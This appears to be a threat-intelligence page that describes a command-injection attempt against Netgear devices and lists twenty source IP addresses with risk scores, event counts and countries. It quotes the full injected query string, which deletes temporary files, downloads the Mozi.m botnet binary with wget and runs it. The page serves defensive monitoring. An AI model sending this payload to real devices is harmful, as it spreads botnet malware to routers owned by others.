Loading threats
HTTP query string containing next_file=netgear.cfg&todo=syscmd&cmd=rm -rf /tmp/*;wget http://*:*/Mozi.m -O /tmp/netgear;sh netgear&curpath=/¤tsetting.htm=1, representing a command injection attempt leveraging the syscmd interface to remove temporary files, download Mozi.m, and execute it.
| IP Address | Risk | Events | Sessions | Country | ASN | Last Seen |
|---|---|---|---|---|---|---|
| 223.123.43.1 | 100% | 24,557 | 1,694 | 🇵🇰 PK | AS138423 | 2026-04-25 |
| 175.107.205.211 | 100% | 6,072 | 671 | 🇵🇰 PK | AS9541 | 2026-04-26 |
| 66.167.166.136 | 100% | 4,665 | 165 | 🇵🇰 PK | AS9541 | 2026-04-22 |
| 14.46.115.236 | 100% | 4,432 | 159 | 🇰🇷 KR | AS4766 | 2026-02-28 |
| 66.167.169.172 | 100% | 4,288 | 522 | 🇵🇰 PK | AS9541 | 2026-04-25 |
| 66.167.147.97 | 100% | 3,532 | 202 | 🇵🇰 PK | AS9541 | 2026-04-26 |
| 137.59.230.204 | 99% | 3,339 | 95 | 🇵🇰 PK | AS9541 | 2026-03-19 |
| 72.255.3.50 | 100% | 2,813 | 112 | 🇵🇰 PK | AS9541 | 2026-03-21 |
| 14.1.106.9 | 100% | 2,765 | 222 | 🇵🇰 PK | AS9541 | 2026-05-02 |
| 110.39.237.16 | 100% | 2,456 | 204 | 🇵🇰 PK | AS38264 | 2026-04-14 |
| 139.135.42.227 | 100% | 2,435 | 185 | 🇵🇰 PK | AS9541 | 2026-04-22 |
| 110.36.77.15 | 100% | 2,369 | 119 | 🇵🇰 PK | AS38264 | 2026-04-08 |
| 66.167.147.70 | 100% | 2,366 | 162 | 🇵🇰 PK | AS9541 | 2026-04-03 |
| 124.29.230.112 | 100% | 2,365 | 115 | 🇵🇰 PK | AS9541 | 2026-03-11 |
| 110.39.231.36 | 100% | 2,361 | 111 | 🇵🇰 PK | AS38264 | 2026-04-14 |
| 139.135.42.26 | 100% | 2,329 | 78 | 🇵🇰 PK | AS9541 | 2026-03-29 |
| 119.160.215.50 | 100% | 2,314 | 2,268 | 🇵🇰 PK | AS137047 | 2026-05-03 |
| 122.194.13.153 | 100% | 2,234 | 73 | 🇨🇳 CN | AS4837 | 2026-02-26 |
| 175.107.2.125 | 100% | 2,120 | 140 | 🇵🇰 PK | AS23888 | 2026-04-26 |
| 110.36.64.245 | 100% | 2,069 | 269 | 🇵🇰 PK | AS38264 | 2026-04-29 |